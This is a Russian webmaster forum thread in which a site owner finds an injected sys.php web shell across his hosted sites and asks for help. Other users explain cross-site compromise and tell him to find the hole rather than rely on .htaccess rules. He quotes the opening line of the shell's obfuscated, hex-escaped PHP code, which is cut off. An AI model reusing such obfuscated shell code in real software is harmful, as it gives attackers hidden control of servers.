- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Тренды маркетинга в 2024 году: мобильные продажи, углубленная аналитика и ИИ
Экспертная оценка Адмитад
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Случилась проблема. Предыстория: на хостинге 4 сайта, один из с них с небольшой посещалкой остальные нет. Ко всем прикручена яндекс метрика. И вот неделю назад на сайтах где нет трафика стали появляются заходы со 100% отказами. Причем на все стразу и одинаковое количество. Я сначала не обратил внимания, а потом увидел в файлах темы одного сайта файл под названием типа sys.php , который я туда не ложил.
В файле этом вот такая макаронина:
<?php ${"\x47L\x4f\x42\x41\x4c\x53"}["\x68u\x77\x69\x76\x63\x61\x71wk\x79\x79"]="ips";${"GL\x4f\x42А так же файл с таким:
Вопрос: могут взломав один сайт залить файлы на другие мои сайты на этом хостинге ?
И как в htaccess ограничить заливку php файлов на хостинг ?
Вопрос: могут взломав один сайт залить файлы на другие мои сайты на этом хостинге ?
На другие ваши сайты на том же аккаунте — да.
И как в htaccess ограничить заливку php файлов на хостинг ?
Никак. Разве что, запретить в .htaccess доступ к дырявым скриптам.
И как в htaccess ограничить заливку php файлов на хостинг ?
Не о том думаешь. Совсем не о том. Думай о дыре, через которую это возможно стало сделать.
Не о том думаешь. Совсем не о том. Думай о дыре, через которую это возможно стало сделать.
А чего о ней думать, если я не знаю как её искать.
Предполагаю, что из-за простого пароля на одном из сайтов т.к. там просто движок был установлен для экспериментов.
А могли испортить как нибудь БД ? Просто если в БД нет никаких вирусов и т.п., то я мог бы просто удалить все с хостинга и по новой перезалить.
Да, дело плохо. Все теперь надо проверять и то не факт, что дыру найдете. Могли в мускуль иньекцию сделать.
Выход искать спеца, что дырень найти.
А чего о ней думать, если я не знаю как её искать.
В соседнем разделе 100500 раз описано и рассказано.
Но чтобы долго не метаться - см закреплённый топик (первых 3 стр достаточно) и этот и этот то же можно.
А так же ссылки из стартпоста со слов "Дополнения к ВП".
то я мог бы просто удалить все с хостинга и по новой перезалить.
Всё те же файлы с дырами? :)) Ну-ну.
Да, в БД может быть шелл, но это не так часто встречается.
Вопрос: могут взломав один сайт залить файлы на другие мои сайты на этом хостинге ?
Да, конечно могут.
И как в htaccess ограничить заливку php файлов на хостинг ?
Даже если вы установите правила в файл htaccess его самого могут заменить, нужно искать источник, а не воевать с последствиями.
Спасибо за советы.
Удалил файлы вируса, проверил ai-bolit, а потом в логах наблюдал интересную картину, как кто-то постоянно дергает эти файлы а в замен 404. Но через день злоумышленник как-то залил свой вирус снова. :)
На одном из сайтов в логах 10К строчек таких
Прочитал в интернетах, что это shell g , вроде базу не трогает. Так значит я удалю фри шаблон, из бэкапа перезалью шаблон основного сайта + применю методы безопасности предложенные в советах и буду смотреть, как на этот раз удастся или нет залить шел снова.
Думаю, что это все было из-за того, что на хостинге был движок с паролем 12345, но за то я получил ценный опыт.